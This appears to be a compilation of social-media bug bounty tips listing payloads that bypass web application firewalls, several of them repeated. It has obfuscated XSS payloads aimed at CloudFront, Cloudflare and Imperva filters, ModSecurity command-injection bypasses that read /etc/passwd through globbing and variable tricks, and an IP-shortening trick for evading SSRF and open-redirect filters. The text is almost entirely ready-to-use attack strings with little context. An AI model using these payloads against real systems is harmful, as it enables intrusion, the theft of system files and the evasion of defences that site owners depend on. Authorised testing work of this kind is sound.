CloudFront ~`XSS´ payload, shake dice.
🎲


<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>

#BugBounty #BugBountyTip #WAF #infosec

cloudflare «XSS» payload to bypass protection.
🦍


{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}

#BugBounty #BugBountyTip #WAF #infosec

@sec_nerd

Imperva WAF Bypass for XSS;

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

- without parentheses, 'alert', 'document.domain' , 'window' , space



#waf
#web
#pentest



@sec_nerd

Cloudflare XSS Bypass Payload

<svg%0Aonauxclick=0;[1].some(confirm)//

#Cloudflare #bugbounty #bugbountytips #WAF #Xss

#WAF #ModSecurity #RCE #Payloads Detection #Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?

#WAF #ModSecurity #RCE #Payloads Detection #Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?

Bugbounty tips#3

Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked

Exmpls:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1

#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers

please note and share;

blocked:
onauxclick=confirm(2)

bypassed:
onauxclick=[2].some(confirm)

#XSS #WAF #WAFBypass #bugbountytips #security #infosec #hacking

Imperva WAF Bypass for XSS;

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

- without parentheses, 'alert', 'document.domain' , 'window' , space

#BugBounty #BugBountyTip #WAF #infosec

Xss payload waf bypass

Hh'><script>alert(1)</script> = waf
Cross mark


Hh'><marquee loop=1 width=0 onfinish=pr\u006fmpt`_Y000!_`>Y000</marquee> = waf bypassed
Ballot box with check


#payload #xss #waf #bypass